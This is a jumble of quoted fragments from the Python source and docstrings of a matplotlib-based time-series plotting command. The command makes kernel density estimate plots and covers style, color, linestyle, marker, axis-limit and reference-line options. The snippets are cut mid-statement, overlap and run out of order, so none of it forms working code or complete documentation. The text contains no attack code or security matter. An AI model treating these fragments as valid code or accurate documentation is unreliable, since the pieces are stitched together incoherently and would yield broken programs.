\"auto\": bar_hatchstyles = plotutils.HATCH_LIST else: bar_hatchstyles = tsutils.make_list(bar_hatchstyles)", "{names} {source_units} {target_units} {round_index} plot_styles: str [optional, default is \"default\"]", "is None: hlines_xmin = nxlim[0] if hlines_xmax is None: hlines_xmax", "= tsutils.make_list(vlines_ymax) vlines_colors = tsutils.make_list(vlines_colors) vlines_linestyles = tsutils.make_list(vlines_linestyles) nylim =", "previous. Color Blind Appropriate Styles The styles \"seaborn-colorblind\", \"tableau-colorblind10\", \"bright\",", "must be same length as `hlines_y`. If None will take", "+-------+----------------+ | v | triangle down | +-------+----------------+ | ^", "# yaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # secondary_y=[bool, [\"domain\", [True,", "i in markerstyles] if colors is not None: icolors =", "False]], 1], # invert_yaxis=[bool, [\"domain\", [True, False]], 1], # plotting_position=[", "+-----------------+-------------------+ | - | horizontal | +-----------------+-------------------+ | + |", "the yaxis. One of 'arithmetic', 'log'. secondary_y [optional, default is", "the secondary y-axis. If a list/tuple, which time-series to plot", "to override the names in the data set. You must", "i in [\" \", None] else i for i in", "= tsutils.make_list(plot_styles) + [\"no-latex\"] style_loc = os.path.join( os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\"", "1], # plot_styles=[ # str, # [ # \"domain\", #", "if colors == \"auto\": colors = None else: colors =", "have {} time-series. \"\"\".format( style, len(nstyle), len(tsd.columns) ) ) )", "defaults to None] List of maximum x values to end", "# type=[str, [\"domain\", [\"kde\",],], 1,], # lag_plot_lag=[int, [\"range\", [1, None]],", "style which has {} style strings, but you have {}", "supplied '{}' for style which has {} style strings, but", "number from 0 to 9 that gets the Nth color", "in the chosen style. At the command line supply a", "[]], None], # vlines_ymax=[float, [\"pass\", []], None], # vlines_colors=[str, [\"pass\",", "xlim=None, ylim=None, secondary_y=False, mark_right=True, scatter_matrix_diagonal=\"kde\", bootstrap_size=50, bootstrap_samples=500, norm_xaxis=False, norm_yaxis=False, lognorm_xaxis=False,", "| < | triangle left | +-------+----------------+ | > |", "norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. {columns} {start_date} {end_date}", "for black, white, and gray, however the \"ieee\" also will", "markerstyles is None: markerstyles = \" \" if style !=", "plt.gca().invert_yaxis() plt.grid(grid) plt.title(title) plt.tight_layout() if ofilename is not None: plt.savefig(ofilename)", "in nstyle: colors.append(st[0]) if len(st) == 1: markerstyles.append(\" \") linestyles.append(\"-\")", "For --logy use --yaxis=\"log\" * For --norm_xaxis use --type=\"norm_xaxis\" *", "vlines_ymax: [optional, defaults to None] List of maximum x values", "\"seaborn-whitegrid\", \"tableau-colorblind10\", and SciencePlots styles \"science\", \"grid\", \"ieee\", \"scatter\", \"notebook\",", "| +-------+----------------+ | ``*`` | star | +-------+----------------+ | h", "{} style strings, but you have {} time-series. \"\"\".format( style,", "None: vlines_ymin = nylim[0] if vlines_ymax is None: vlines_ymax =", "default is False] Whether to plot grid lines on the", "\"probability_density\"]: ax = tsd.plot.kde( legend=legend, subplots=subplots, sharex=sharex, sharey=sharey, style=None, logx=logx,", "the \"IEEE\" journal. The \"grayscale\" is another style useful for", "[True, False]], 1], # scatter_matrix_diagonal=[str, [\"domain\", [\"kde\", \"hist\"]], 1], #", "the plot along the diagonal. One of 'kde' for Kernel", "plot along the diagonal. One of 'kde' for Kernel Density", "vlines_linestyles=[ # str, # [\"domain\", [\"auto\", None, \"\", \" \",", "'] The default ' ' will not plot a marker.", "ylim = plotutils.know_your_limits(ylim, axis=yaxis) plot_styles = tsutils.make_list(plot_styles) + [\"no-latex\"] style_loc", "horizontal | +-----------------+-------------------+ | + | crossed | +-----------------+-------------------+ |", "and upper limits for the x-axis of the plot. For", "the lower limit on the data and set the upper", "xtitle=[str, [\"pass\", []], 1], # ytitle=[str, [\"pass\", []], 1], #", "in inches. legend [optional, defaults to True] Whether to display", "Code | Color | +======+=========+ | b | blue |", "# \"dark_background\", # \"fast\", # \"fivethirtyeight\", # \"ggplot\", # \"grayscale\",", "if hlines_y is not None: hlines_y = tsutils.make_list(hlines_y) hlines_xmin =", "style of the plot. One or more of Matplotlib styles", "# grid=[bool, [\"domain\", [True, False]], 1], # label_rotation=[float, [\"pass\", []],", "the plot. One or more of Matplotlib styles \"classic\", \"Solarize_Light2\",", "return the Matplotlib figure that can then be changed or", "* * The --logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis, and *", "normally use the time-series names associated with the input data.", "change the chart size to fit in a column of", "[]], 1], # type=[str, [\"domain\", [\"kde\",],], 1,], # lag_plot_lag=[int, [\"range\",", "'auto'] The default 'auto' will cycle through matplotlib colors in", "using the Python API. To not display lines use a", "use '--yaxis=\"log\"' instead. xlim [optional, default is based on range", "= itertools.cycle(markerstyles) ilinestyles = itertools.cycle(linestyles) # Only for bar, barh,", "\"ieee\", # \"scatter\", # \"notebook\", # \"high-vis\", # \"bright\", #", "[1, None]], 1], # drawstyle=[str, [\"pass\", []], 1], # por=[bool,", "or more of Matplotlib styles \"classic\", \"Solarize_Light2\", \"bmh\", \"dark_background\", \"fast\",", "API. +-----------------+-------------------+ | bar_hatchstyles | Description | +=================+===================+ | /", "plot. See `xlim` for examples. xaxis : str [optional, default", "limit on the data and set the upper limit to", "strings. Can identify colors in four different ways. 1. Use", "ofilename is not None: plt.savefig(ofilename) return plt kde.__doc__ = kde_cli.__doc__", "on the data and set the upper limit to 1000.", "based on range of y values] Comma separated lower and", "--lognorm_xaxis, and * --lognorm_yaxis options are deprecated. * * For", "the color pallette in the current plot style. hlines_linestyles: [optional,", "star | +-------+----------------+ | h | hexagon1 | +-------+----------------+ |", "target_units=None, lag_plot_lag=1, plot_styles=\"bright\", hlines_y=None, hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None,", "Matplotlib figure that can then be changed or added to", "# \"seaborn-poster\", # \"seaborn-talk\", # \"seaborn-ticks\", # \"seaborn-white\", # \"seaborn-whitegrid\",", "on range of x values] Comma separated lower and upper", "+-------+----------------+ | s | square | +-------+----------------+ | p |", "``-`` | solid | +---------+--------------+ | -- | dashed |", "x-axis. ytitle : str [optional, default depends on ``type``] Title", "], # ) def kde( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False,", "c | cyan | +------+---------+ | m | magenta |", "'auto' will iterate through the available matplotlib line types. Otherwise", "None]], 1], # drawstyle=[str, [\"pass\", []], 1], # por=[bool, [\"domain\",", "plot style. vlines_linestyles: [optional, defaults to None] List of linestyles", "for bar plots. label_skip : int [optional] Skip for major", "[\"domain\", [\"arithmetic\", \"log\"]], 1], # yaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1],", "using the 'style' keyword. +---------+--------------+ | Code | Lines |", "a secondary_y axis, should the legend label the axis of", "1], # por=[bool, [\"domain\", [True, False]], 1], # invert_xaxis=[bool, [\"domain\",", "for the manipulation of time series.\"\"\" from __future__ import absolute_import,", "If a list must be same length as `hlines_y`. If", "triangle left | +-------+----------------+ | > | triangle right |", "linestyles = [\" \"] else: linestyles = [\" \" if", "end each horizontal line. If a list must be same", "end_date=None, clean=False, skiprows=None, index_type=\"datetime\", names=None, ofilename=\"plot.png\", xtitle=\"\", ytitle=\"\", title=\"\", figsize=\"10,6.0\",", "a marker. If 'auto' will iterate through the available matplotlib", "False] In case subplots=True, share y axis. colors [optional, default", "of 'arithmetic', 'log'. yaxis : str [optional, default is 'arithmetic']", "the others. Comma separated matplotlib style strings per time-series. Just", "1 if pltfreq == \"none\": short_freq = \"\" else: #", "to be able to be distinguished by someone with color", "to None] List of colors for the vertical lines. If", "the linestyle for all vertical lines. If a list must", "ofilename=\"plot.png\", xtitle=\"\", ytitle=\"\", title=\"\", figsize=\"10,6.0\", legend=None, legend_names=None, subplots=False, sharex=True, sharey=False,", "+-----------------+-------------------+ | o | small circle | +-----------------+-------------------+ | O", "tstoolbox import tsutils from .. import plotutils warnings.filterwarnings(\"ignore\") @mando.command(\"kde\", formatter_class=RSTHelpFormatter,", "+=========+==============+ | ``-`` | solid | +---------+--------------+ | -- |", "| hlines_y | +-------+----------------+ | None | nothing | +-------+----------------+", "\"scatter\", # \"notebook\", # \"high-vis\", # \"bright\", # \"vibrant\", #", "\"lognorm_xaxis\", \"weibull_xaxis\", \"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\", ]: if hlines_y is not", "y-axis. title : str [optional, defaults to ''] Title of", ") if xaxis == \"log\": logx = True if yaxis", "True ): warnings.warn( \"\"\" * * The --logx, --logy, --norm_xaxis,", "where to place a vertical line. vlines_ymin: [optional, defaults to", "bar_hatchstyles [optional, default to \"auto\", only used if type equal", "AttributeError: short_freq = \"\" if colors == \"auto\": colors =", "figsize = tsutils.make_list(figsize, n=2) _, ax = plt.subplots(figsize=figsize) if type", "reference: http://matplotlib.org/api/artist_api.html markerstyles [optional, default to ' '] The default", "1], # yaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # secondary_y=[bool, [\"domain\",", "# \"seaborn-pastel\", # \"seaborn-poster\", # \"seaborn-talk\", # \"seaborn-ticks\", # \"seaborn-white\",", "[]], None], # hlines_xmax=[float, [\"pass\", []], None], # hlines_colors=[str, [\"pass\",", "# invert_yaxis=[bool, [\"domain\", [True, False]], 1], # plotting_position=[ # str,", "or legend is None) type = \"kde\" import matplotlib matplotlib.use(\"Agg\")", "For --norm_xaxis use --type=\"norm_xaxis\" * For --norm_yaxis use --type=\"norm_yaxis\" *", "N is a number from 0 to 9 that gets", "rides some or all of the characteristics of the previous.", "If plot type is 'scatter_matrix', this specifies the plot along", "be able to be distinguished by someone with color blindness.", "value for the entire plot. hlines_colors: [optional, defaults to None]", "# \"notebook\", # \"high-vis\", # \"bright\", # \"vibrant\", # \"muted\",", "+---------+--------------+ | '' | draw nothing | +---------+--------------+ Line reference:", "all vertical lines. A missing value or None will end", "the minimum x values for all vertical lines. A missing", "from .. import plotutils warnings.filterwarnings(\"ignore\") @mando.command(\"kde\", formatter_class=RSTHelpFormatter, doctype=\"numpy\") @tsutils.doc(plotutils.ldocstrings) def", "[optional, default is False] Invert the x-axis. invert_yaxis [optional, default", "plotutils.LINE_LIST], # None, # ], # ) def kde( input_ts=\"-\",", "using the 'style' keyword. +-------+----------------+ | Code | Markers |", "None], # vlines_linestyles=[ # str, # [\"domain\", [\"auto\", None, \"\",", "if vlines_ymin is None: vlines_ymin = nylim[0] if vlines_ymax is", "= True if yaxis == \"log\": logy = True xlim", "'filename.png' will create a PNG file. If used within Python,", "plotutils.LINE_LIST], None], # markerstyles=[str, [\"domain\", [\"auto\", None, \"\", \" \",", "else: linestyles = tsutils.make_list(linestyles) if bar_hatchstyles == \"auto\": bar_hatchstyles =", "plots. Only used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and", "legend_names=legend_names, subplots=subplots, sharex=sharex, sharey=sharey, colors=colors, linestyles=linestyles, markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles, style=style, logx=logx,", "\".mplstyle\") if os.path.exists(os.path.join(style_loc, i + \".mplstyle\")) else i for i", "[\"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\"]: vlines_x = ppf(tsutils.make_list(vlines_x)) plt.vlines( vlines_x, vlines_ymin, vlines_ymax,", "\" \", \" \"] + plotutils.MARKER_LIST], None], # bar_hatchstyles=[str, [\"domain\",", "file. If used within Python, and `ofilename` is None will", "None: if type in [\"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\"]: hlines_y = ppf(tsutils.make_list(hlines_y))", "skiprows=skiprows, names=names, index_type=index_type, start_date=start_date, end_date=end_date, pick=columns, round_index=round_index, dropna=\"all\", source_units=source_units, target_units=target_units,", "range of y values] Comma separated lower and upper limits", "# \"Solarize_Light2\", # \"bmh\", # \"dark_background\", # \"fast\", # \"fivethirtyeight\",", "plotutils.know_your_limits(xlim, axis=xaxis) ylim = plotutils.know_your_limits(ylim, axis=yaxis) plot_styles = tsutils.make_list(plot_styles) +", "to None] List of colors for the horizontal lines. If", "draw nothing | +---------+--------------+ Line reference: http://matplotlib.org/api/artist_api.html markerstyles [optional, default", "= plotutils.know_your_limits(xlim, axis=xaxis) ylim = plotutils.know_your_limits(ylim, axis=yaxis) plot_styles = tsutils.make_list(plot_styles)", "Python API. Separated 'colors', 'linestyles', and 'markerstyles' instead of using", "None will take for the standard linestyles list. \"\"\" plt", "# \"seaborn-paper\", # \"seaborn-pastel\", # \"seaborn-poster\", # \"seaborn-talk\", # \"seaborn-ticks\",", "List of linestyles for the vertical lines. If a single", "NANs from beginning and end. {force_freq} invert_xaxis [optional, default is", "to sort the values for the probability plots. Only used", "= \"\" if colors == \"auto\": colors = None else:", "plt = kde( input_ts=input_ts, columns=columns, start_date=start_date, end_date=end_date, clean=clean, skiprows=skiprows, index_type=index_type,", "None] List of linestyles for the vertical lines. If a", "cyan | +------+---------+ | m | magenta | +------+---------+ |", "list of strings if using the Python API. Separated 'colors',", "around some old option defaults with the implementation of #", "Color Names | +==================+ | red | +------------------+ | burlywood", "diagonal | +-----------------+-------------------+ | o | small circle | +-----------------+-------------------+", "[]], None], # linestyles=[str, [\"domain\", [\"auto\", None, \"\", \" \",", "except AttributeError: short_freq = \"\" if colors == \"auto\": colors", "hlines_y, hlines_xmin, hlines_xmax, colors=hlines_colors, linestyles=hlines_linestyles, ) if vlines_x is not", "number will be used as the minimum x values for", "that are setup to be able to be distinguished by", "value for the entire plot. vlines_ymax: [optional, defaults to None]", "the y-axis. plotting_position : str [optional, default is 'weibull'] {plotting_position_table}", "example, '--xlim 1,1000' would limit the plot from 1 to", "diamond | +-------+----------------+ | _ | hlines_y | +-------+----------------+ |", "the entire plot. hlines_colors: [optional, defaults to None] List of", "'--xaxis=\"log\"' instead. logy DEPRECATED: use '--yaxis=\"log\"' instead. xlim [optional, default", "\"bmh\", \"dark_background\", \"fast\", \"fivethirtyeight\", \"ggplot\", \"grayscale\", \"seaborn\", \"seaborn-bright\", \"seaborn-colorblind\", \"seaborn-dark\",", "+------------------+ | ...etc. | +------------------+ Color reference: http://matplotlib.org/api/colors_api.html linestyles [optional,", "2], # legend=[bool, [\"domain\", [True, False]], 1], # legend_names=[str, [\"pass\",", ") ) ) colors = [] markerstyles = [] linestyles", "None imarkerstyles = itertools.cycle(markerstyles) ilinestyles = itertools.cycle(linestyles) # Only for", "figsize=\"10,6.0\", legend=None, legend_names=None, subplots=False, sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\" \",", "the maximum x value for the entire plot. vlines_colors: [optional,", "+-------+----------------+ | ' ' | nothing | +-------+----------------+ | ''", "[\"range\", [1, None]], 1], # drawstyle=[str, [\"pass\", []], 1], #", "lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. prob_plot_sort_values : str [optional, default", "plot on the secondary y-axis. If a list/tuple, which time-series", "\"] else: linestyles = [\" \" if i in [\"", "| nothing | +-------+----------------+ | '' | nothing | +-------+----------------+", "then will be used as the linestyle for all vertical", "chosen. xtitle : str [optional, default depends on ``type``] Title", "--type=\"norm_xaxis\" * For --norm_yaxis use --type=\"norm_yaxis\" * For --lognorm_xaxis use", "'plot.png'] Output filename for the plot. Extension defines the type,", "a number from 0 to 9 that gets the Nth", "have to have the same number of style strings as", "if imarkerstyles is not None: m = next(imarkerstyles) else: m", "is not None: hlines_y = tsutils.make_list(hlines_y) hlines_xmin = tsutils.make_list(hlines_xmin) hlines_xmax", "Invert the y-axis. plotting_position : str [optional, default is 'weibull']", "bar_hatchstyles | Description | +=================+===================+ | / | diagonal hatching", "[optional, defaults to ''] Title of chart. figsize : str", "case subplots=True, share y axis. colors [optional, default is 'auto']", "[\"domain\", [True, False]], 1], # colors=[str, [\"pass\", []], None], #", "| HTML Color Names | +==================+ | red | +------------------+", "tsutils.make_list(hlines_linestyles) nxlim = ax.get_xlim() if hlines_xmin is None: hlines_xmin =", "= [\" \" if i in [\" \", None] else", "be the maximum x value for all horizontal lines. A", "| plus | +-------+----------------+ | x | x | +-------+----------------+", "# hlines_linestyles=[ # str, # [\"domain\", [\"auto\", None, \"\", \"", "[optional, defaults to 50] The size of the random subset", "or \"Density\" if legend is True: plt.legend(loc=\"best\") if hlines_y is", "+------+---------+ | r | red | +------+---------+ | c |", "| dashed | +---------+--------------+ | -. | dash_dot | +---------+--------------+", "lines. If a list must be same length as `vlines_x`.", "mando legend = bool(legend == \"\" or legend == \"True\"", "limit to 1000. ylim [optional, default is based on range", "[\"pass\", []], 1], # por=[bool, [\"domain\", [True, False]], 1], #", "index_type=\"datetime\", names=None, ofilename=\"plot.png\", xtitle=\"\", ytitle=\"\", title=\"\", figsize=\"10,6.0\", legend=None, legend_names=None, subplots=False,", "+---------+--------------+ | -. | dash_dot | +---------+--------------+ | : |", "example 'r*--' is a red dashed line with star marker.", "random subset for 'bootstrap' plot. bootstrap_samples [optional, defaults to 500]", "[\"domain\", [True, False]], 1], # legend_names=[str, [\"pass\", []], 1], #", "= next(imarkerstyles) else: m = None if ilinestyles is not", "horizontal lines. A missing value or None will end at", "+------------------+ Color reference: http://matplotlib.org/api/colors_api.html linestyles [optional, default to 'auto'] If", "None], # hlines_xmin=[float, [\"pass\", []], None], # hlines_xmax=[float, [\"pass\", []],", "for example 'r*--' is a red dashed line with star", "# \"scatter\", # \"notebook\", # \"high-vis\", # \"bright\", # \"vibrant\",", "# \"grid\", # \"ieee\", # \"scatter\", # \"notebook\", # \"high-vis\",", "\"high-vis\", # \"bright\", # \"vibrant\", # \"muted\", # \"retro\", #", "Number or list of y values where to place a", "True if yaxis == \"log\": logy = True xlim =", "same length as `hlines_y`. If a single number will be", "as pd from mando.rst_text_formatter import RSTHelpFormatter from tstoolbox import tsutils", "that gets the Nth color from the current style. 2.", "+---------+--------------+ | ' ' | draw nothing | +---------+--------------+ |", "and 'markerstyles' instead of using the 'style' keyword. +-------+----------------+ |", "logy DEPRECATED: use '--yaxis=\"log\"' instead. xlim [optional, default is based", "3 | tri_left | +-------+----------------+ | 4 | tri_right |", "str [optional, defaults to 'kde'] If plot type is 'scatter_matrix',", "add a match line where x == y. Set to", "None: vlines_x = tsutils.make_list(vlines_x) vlines_ymin = tsutils.make_list(vlines_ymin) vlines_ymax = tsutils.make_list(vlines_ymax)", "is black. 4. Any of the HTML color names. +------------------+", "the data and set the upper limit to 1000. ylim", "'auto' will iterate through the available matplotlib hatch types. Otherwise", "xlim=[float, [\"pass\", []], 2], # ylim=[float, [\"pass\", []], 2], #", "\"fivethirtyeight\", \"ggplot\", \"grayscale\", \"seaborn\", \"seaborn-bright\", \"seaborn-colorblind\", \"seaborn-dark\", \"seaborn-dark-palette\", \"seaborn-darkgrid\", \"seaborn-deep\",", "the type of the xaxis. One of 'arithmetic', 'log'. yaxis", "linestyles=linestyles, markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles, style=style, logx=logx, logy=logy, xaxis=xaxis, yaxis=yaxis, xlim=xlim, ylim=ylim,", "[ # \"domain\", # [\"weibull\", \"benard\", \"tukey\", \"gumbel\", \"hazen\", \"cunnane\",", "tsutils.make_list(vlines_x) vlines_ymin = tsutils.make_list(vlines_ymin) vlines_ymax = tsutils.make_list(vlines_ymax) vlines_colors = tsutils.make_list(vlines_colors)", "\"vibrant\", \"muted\", and \"retro\". If multiple styles then each over", "and upper limits for the y-axis of the plot. See", "'arithmetic'] Defines the type of the xaxis. One of 'arithmetic',", "\"seaborn-white\", \"seaborn-whitegrid\", \"tableau-colorblind10\", and SciencePlots styles \"science\", \"grid\", \"ieee\", \"scatter\",", "* For --logx use --xaxis=\"log\" * For --logy use --yaxis=\"log\"", "| ' ' | nothing | +-------+----------------+ | '' |", "| -- | dashed | +---------+--------------+ | -. | dash_dot", "per time-series. Just combine codes in 'ColorMarkerLine' order, for example", "[\"domain\", [\"arithmetic\", \"log\"]], 1], # secondary_y=[bool, [\"domain\", [True, False]], 1],", "For --lognorm_xaxis use --type=\"lognorm_xaxis\" * For --lognorm_yaxis use --type=\"lognorm_yaxis\" *", "[optional, defaults to None] List of colors for the vertical", "' will not plot a marker. If 'auto' will iterate", "secondary_y axis, should the legend label the axis of the", "default is 'weibull'] {plotting_position_table} Only used for norm_xaxis, norm_yaxis, lognorm_xaxis,", "\"log\"]], 1], # yaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # secondary_y=[bool,", "1], # sharey=[bool, [\"domain\", [True, False]], 1], # colors=[str, [\"pass\",", "should the legend label the axis of the various time-series", "\"kde\" will create a plot of estimation of the probability", "| x | crossed diagonal | +-----------------+-------------------+ | o |", "style is appropriate for black, white, and gray, however the", "hlines_y=[float, [\"pass\", []], None], # hlines_xmin=[float, [\"pass\", []], None], #", "subplots=False, sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\", style=\"auto\", logx=False,", "None else i for i in markerstyles] if colors is", "| +---------+--------------+ | ' ' | draw nothing | +---------+--------------+", "will iterate through the available matplotlib line types. Otherwise on", "[\"weibull\", \"benard\", \"tukey\", \"gumbel\", \"hazen\", \"cunnane\", \"california\"], # ], #", "\"\"\" ) if xaxis == \"log\": logx = True if", "| Color | +======+=========+ | b | blue | +------+---------+", "default is False] Invert the y-axis. plotting_position : str [optional,", "None will return the Matplotlib figure that can then be", "default is based on range of x values] Comma separated", "str, # [ # \"domain\", # [ # \"classic\", #", "default to 1] The lag used if ``type`` \"lag_plot\" is", "= ax.get_xlim() if hlines_xmin is None: hlines_xmin = nxlim[0] if", "minimum x values for all vertical lines. A missing value", "= str(tsd.index.freq).lower() if pltfreq.split(\" \")[0][1:] == \"1\": beginstr = 3", "list. \"\"\" plt = kde( input_ts=input_ts, columns=columns, start_date=start_date, end_date=end_date, clean=clean,", "subsets of 'bootstrap_size'. norm_xaxis DEPRECATED: use '--type=\"norm_xaxis\"' instead. norm_yaxis DEPRECATED:", "If None will take for the standard linestyles list. \"\"\"", "+-----------------+-------------------+ | x | crossed diagonal | +-----------------+-------------------+ | o", "tsutils.make_list(colors) if linestyles == \"auto\": linestyles = plotutils.LINE_LIST else: linestyles", "m = next(imarkerstyles) else: m = None if ilinestyles is", "plot. For example, '--xlim 1,1000' would limit the plot from", "to plot on secondary y-axis. mark_right [optional, default is True]", "for all horizontal lines. A missing value or None will", "str [optional, defaults to ''] Title of chart. figsize :", "is chosen. xtitle : str [optional, default depends on ``type``]", "type of the xaxis. One of 'arithmetic', 'log'. yaxis :", "photo-copyable black, white, nd gray. Matplotlib styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html SciencePlots styles:", "lines use a space (' ') as the linestyle code.", "| blue | +------+---------+ | g | green | +------+---------+", "\", None] else i for i in linestyles] markerstyles =", "and end. {force_freq} invert_xaxis [optional, default is False] Invert the", "xy_match_line=\"\", grid=False, label_rotation=None, label_skip=1, force_freq=None, drawstyle=\"default\", por=False, invert_xaxis=False, invert_yaxis=False, round_index=None,", "str [optional, default is 'descending'] How to sort the values", "the upper limit to 1000. ylim [optional, default is based", "True or lognorm_xaxis is True or lognorm_yaxis is True ):", "others. Comma separated matplotlib style strings per time-series. Just combine", "The 'width,height' of plot in inches. legend [optional, defaults to", "= kde( input_ts=input_ts, columns=columns, start_date=start_date, end_date=end_date, clean=clean, skiprows=skiprows, index_type=index_type, names=names,", "[\"range\", [0, None]], 1], # xy_match_line=[str, [\"pass\", []], 1], #", "# \"seaborn-dark-palette\", # \"seaborn-darkgrid\", # \"seaborn-deep\", # \"seaborn-muted\", # \"seaborn-notebook\",", "Extension defines the type, for example 'filename.png' will create a", "must be same length as `hlines_y`. If a single number", "\"seaborn-deep\", # \"seaborn-muted\", # \"seaborn-notebook\", # \"seaborn-paper\", # \"seaborn-pastel\", #", "| triangle left | +-------+----------------+ | > | triangle right", "variants produce step-plots. 'steps' is equivalent to 'steps-pre' and is", "[\"range\", [0, None]], 2], # legend=[bool, [\"domain\", [True, False]], 1],", "plus | +-------+----------------+ | x | x | +-------+----------------+ |", "| +------------------+ | chartreuse | +------------------+ | ...etc. | +------------------+", "within Python a list of color code strings. Can identify", "default to 'auto'] If 'auto' will iterate through the available", "to a line style code. grid [optional, default is False]", "mark_right=[bool, [\"domain\", [True, False]], 1], # scatter_matrix_diagonal=[str, [\"domain\", [\"kde\", \"hist\"]],", "The default 'auto' will cycle through matplotlib colors in the", "if xaxis == \"log\": logx = True if yaxis ==", "import itertools import os import warnings import mando import numpy", "tsd.plot.kde( legend=legend, subplots=subplots, sharex=sharex, sharey=sharey, style=None, logx=logx, logy=logy, xlim=xlim, ylim=ylim,", "examples. xaxis : str [optional, default is 'arithmetic'] Defines the", "from the table below. +------+---------+ | Code | Color |", "if None is replaced by 'colors', 'linestyles', and 'markerstyles' options.", "[optional, default depends on ``type``] Title of x-axis. ytitle :", "current plot style. hlines_linestyles: [optional, defaults to None] List of", "color codes, or within Python a list of color code", "When using a secondary_y axis, should the legend label the", "available matplotlib marker types. Otherwise on the command line a", "the current plot style. hlines_linestyles: [optional, defaults to None] List", "same length as `hlines_y`. If None will take from the", "IndexError: linestyles.append(\" \") else: markerstyles.append(\" \") linestyles.append(st[1:]) if linestyles is", "os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\" ) plot_styles = [ os.path.join(style_loc, i +", "except IndexError: linestyles.append(\" \") else: markerstyles.append(\" \") linestyles.append(st[1:]) if linestyles", "from mando.rst_text_formatter import RSTHelpFormatter from tstoolbox import tsutils from ..", "default is False] Whether to plot on the secondary y-axis.", "help pretty print the frequency try: try: pltfreq = str(tsd.index.freq,", "vlines_linestyles=\"-\", **kwds, ): r\"\"\"Plot data.\"\"\" # Need to work around", "chart. figsize : str [optional, defaults to '10,6.5'] The 'width,height'", "title=\"\", figsize=\"10,6.0\", legend=None, legend_names=None, subplots=False, sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\"", "\"] + plotutils.LINE_LIST], # None, # ], # vlines_x=[float, [\"pass\",", "names. +------------------+ | HTML Color Names | +==================+ | red", "the minimum x value for the entire plot. vlines_ymax: [optional,", "[\"domain\", [True, False]], 1], # invert_yaxis=[bool, [\"domain\", [True, False]], 1],", "if ilinestyles is not None: l = next(ilinestyles) else: l", "columns=None, start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\", names=None, ofilename=\"plot.png\", xtitle=\"\", ytitle=\"\",", "[\"pass\", []], 1], # label_skip=[int, [\"range\", [1, None]], 1], #", "bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation, label_skip=label_skip,", ": str [optional, default depends on ``type``] Title of y-axis.", "round_index=round_index, plotting_position=plotting_position, prob_plot_sort_values=prob_plot_sort_values, source_units=source_units, target_units=target_units, lag_plot_lag=lag_plot_lag, plot_styles=plot_styles, hlines_y=hlines_y, hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax,", "One of 'arithmetic', 'log'. secondary_y [optional, default is False] Whether", "x values to end each horizontal line. If a list", "is 'descending'] How to sort the values for the probability", "plt.vlines( vlines_x, vlines_ymin, vlines_ymax, colors=vlines_colors, linestyles=vlines_linestyles, ) plt.xlabel(xtitle) plt.ylabel(ytitle) if", "defaults to 50] The size of the random subset for", "is True: plt.gca().invert_xaxis() if invert_yaxis is True: plt.gca().invert_yaxis() plt.grid(grid) plt.title(title)", "separated matplotlib style strings per time-series. Just combine codes in", "One or more of Matplotlib styles \"classic\", \"Solarize_Light2\", \"bmh\", \"dark_background\",", "vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", ): r\"\"\"Kernel density estimation of probability", "plot. Extension defines the type, for example 'filename.png' will create", "linestyle then will be used as the linestyle for all", "display the legend. legend_names : str [optional, defaults to None]", "| +-------+----------------+ | ' ' | nothing | +-------+----------------+ |", "type equal to \"bar\", \"barh\", \"bar_stacked\", and \"barh_stacked\"] If 'auto'", "* For --norm_xaxis use --type=\"norm_xaxis\" * For --norm_yaxis use --type=\"norm_yaxis\"", "drawstyle=\"default\", por=False, invert_xaxis=False, invert_yaxis=False, round_index=None, plotting_position=\"weibull\", prob_plot_sort_values=\"descending\", source_units=None, target_units=None, lag_plot_lag=1,", "which time-series to plot on secondary y-axis. mark_right [optional, default", "vlines_colors=None, vlines_linestyles=\"-\", **kwds, ): r\"\"\"Plot data.\"\"\" # Need to work", "secondary y-axis. mark_right [optional, default is True] When using a", "automatically. scatter_matrix_diagonal : str [optional, defaults to 'kde'] If plot", "[]], None], # vlines_ymin=[float, [\"pass\", []], None], # vlines_ymax=[float, [\"pass\",", "values where to place a vertical line. vlines_ymin: [optional, defaults", "[\"pass\", []], None], # vlines_linestyles=[ # str, # [\"domain\", [\"auto\",", "some old option defaults with the implementation of # mando", "+---------+--------------+ | : | dotted | +---------+--------------+ | None |", "sharey=sharey, style=None, logx=logx, logy=logy, xlim=xlim, ylim=ylim, secondary_y=secondary_y, figsize=figsize, ) for", "{source_units} {target_units} {round_index} plot_styles: str [optional, default is \"default\"] Set", "str [optional, defaults to 'plot.png'] Output filename for the plot.", "str [optional, defaults to None] Legend would normally use the", "instead of using the 'style' keyword. +-------+----------------+ | Code |", "[\"domain\", [\"kde\",],], 1,], # lag_plot_lag=[int, [\"range\", [1, None]], 1], #", "xy_match_line=[str, [\"pass\", []], 1], # grid=[bool, [\"domain\", [True, False]], 1],", "List of minimum y values to start the vertical line.", "| hexagon2 | 